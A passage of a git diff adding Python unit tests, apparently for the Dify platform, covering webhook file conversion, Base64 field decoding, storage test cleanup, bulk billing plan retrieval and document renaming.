core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py new file mode 100644 index 0000000000..bf013c4bae --- /dev/null +++ b/api/tests/unit_tests/libs/test_encryption.py @@ -0,0 +1,150 @@ +""" +Unit tests for field encoding/decoding utilities. + +These tests verify Base64 encoding/decoding functionality and +proper error handling and fallback behavior. +""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" + encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" + + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage") def get_example_filename() -> str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/api/tests/unit_tests/services/test_billing_service.py b/api/tests/unit_tests/services/test_billing_service.py index 915aee3fa7..f50f744a75 100644 --- a/api/tests/unit_tests/services/test_billing_service.py +++ b/api/tests/unit_tests/services/test_billing_service.py @@ -1156,6 +1156,199 @@ class TestBillingServiceEdgeCases: assert "Only team owner or team admin can perform this action" in str(exc_info.value) +class TestBillingServiceSubscriptionOperations: + """Unit tests for subscription operations in BillingService. + + Tests cover: + - Bulk plan retrieval with chunking + - Expired subscription cleanup whitelist retrieval + """ + + @pytest.fixture + def mock_send_request(self): + """Mock _send_request method.""" + with patch.object(BillingService, "_send_request") as mock: + yield mock + + def test_get_plan_bulk_with_empty_list(self, mock_send_request): + """Test bulk plan retrieval with empty tenant list.""" + # Arrange + tenant_ids = [] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + mock_send_request.assert_not_called() + + def test_get_plan_bulk_with_chunking(self, mock_send_request): + """Test bulk plan retrieval with more than 200 tenants (chunking logic).""" + # Arrange - 250 tenants to test chunking (chunk_size = 200) + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk: tenants 0-199 + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk: tenants 200-249 + second_chunk_response = { + "data": {f"tenant-{i}": {"plan": "professional", "expiration_date": 1767225600} for i in range(200, 250)} + } + + mock_send_request.side_effect = [first_chunk_response, second_chunk_response] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 250 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert result["tenant-200"]["plan"] == "professional" + assert result["tenant-249"]["plan"] == "professional" + assert mock_send_request.call_count == 2 + + # Verify first chunk call + first_call = mock_send_request.call_args_list[0] + assert first_call[0][0] == "POST" + assert first_call[0][1] == "/subscription/plan/batch" + assert len(first_call[1]["json"]["tenant_ids"]) == 200 + + # Verify second chunk call + second_call = mock_send_request.call_args_list[1] + assert len(second_call[1]["json"]["tenant_ids"]) == 50 + + def test_get_plan_bulk_with_partial_batch_failure(self, mock_send_request): + """Test bulk plan retrieval when one batch fails but others succeed.""" + # Arrange - 250 tenants, second batch will fail + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk succeeds + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk fails - need to create a mock that raises when called + def side_effect_func(*args, **kwargs): + if mock_send_request.call_count == 1: + return first_chunk_response + else: + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should only have data from first batch + assert len(result) == 200 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert "tenant-200" not in result + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_all_batches_failing(self, mock_send_request): + """Test bulk plan retrieval when all batches fail.""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # All chunks fail + def side_effect_func(*args, **kwargs): + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should return empty dict + assert result == {} + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_exactly_200_tenants(self, mock_send_request): + """Test bulk plan retrieval with exactly 200 tenants (boundary condition).""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(200)] + mock_send_request.return_value = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 200 + assert mock_send_request.call_count == 1 + + def test_get_plan_bulk_with_empty_data_response(self, mock_send_request): + """Test bulk plan retrieval with empty data in response.""" + # Arrange + tenant_ids = ["tenant-1", "tenant-2"] + mock_send_request.return_value = {"data": {}} + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + + def test_get_expired_subscription_cleanup_whitelist_success(self, mock_send_request): + """Test successful retrieval of expired subscription cleanup whitelist.""" + # Arrange + api_response = [ + { + "created_at": "2025-10-16T01:56:17", + "tenant_id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", + "contact": "example@dify.ai", + "id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe5", + "expired_at": "2026-01-01T01:56:17", + "updated_at": "2025-10-16T01:56:17", + }, + { + "created_at": "2025-10-16T02:00:00", + "tenant_id": "tenant-2", + "contact": "test@example.com", + "id": "whitelist-id-2", + "expired_at": "2026-02-01T00:00:00", + "updated_at": "2025-10-16T02:00:00", + }, + { + "created_at": "2025-10-16T03:00:00", + "tenant_id": "tenant-3", + "contact": "another@example.com", + "id": "whitelist-id-3", + "expired_at": "2026-03-01T00:00:00", + "updated_at": "2025-10-16T03:00:00", + }, + ] + mock_send_request.return_value = {"data": api_response} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert - should return only tenant_ids + assert result == ["36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", "tenant-2", "tenant-3"] + assert len(result) == 3 + assert result[0] == "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6" + assert result[1] == "tenant-2" + assert result[2] == "tenant-3" + mock_send_request.assert_called_once_with("GET", "/subscription/cleanup/whitelist") + + def test_get_expired_subscription_cleanup_whitelist_empty_list(self, mock_send_request): + """Test retrieval of empty cleanup whitelist.""" + # Arrange + mock_send_request.return_value = {"data": []} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert + assert result == [] + assert len(result) == 0 + + class TestBillingServiceIntegrationScenarios: """Integration-style tests simulating real-world usage scenarios. diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + 